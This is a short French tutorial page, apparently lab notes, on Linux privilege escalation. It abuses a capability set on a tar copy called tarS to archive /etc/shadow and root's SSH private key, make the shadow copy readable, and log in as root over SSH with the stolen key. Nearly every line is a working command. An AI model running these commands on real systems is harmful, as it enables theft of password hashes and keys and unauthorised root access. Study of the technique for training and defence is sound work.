Capabilities (tarS) - Linux Privilege Escalation

Élévation de privilèges (Capabilities)

getcap -r / 2>/dev/null

Utilisez la commande getcap pour explorer les capacités du système. Identifiez une capacité qui permet de lister tous les documents du système.

Capture du fichier /etc/shadow avec tar

Créez un dossier dans le répertoire /tmp et incluez le fichier /etc/shadow avec la commande suivante :

tarS -cvf shadow.tar /etc/shadow

Décompressez l'archive dans le répertoire /tmp. En tant que créateur, modifiez les droits pour pouvoir visualiser le contenu du fichier /etc/shadow.

tar -xvf /tmp/shadow.tar -C /tmp/
chmod 644 /tmp/etc/shadow

Capture de la clé privée .ssh avec tar

Capturez la clé privée .ssh de l'utilisateur root avec la commande suivante :

tarS -cvf id_rsa.tar /root/.ssh/id_rsa

Connexion SSH avec la clé privée capturée:

Utilisez la clé privée capturée pour établir une connexion SSH à l'utilisateur root sur la machine locale.

ssh -i id_rsa root@localhost -p 2082

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?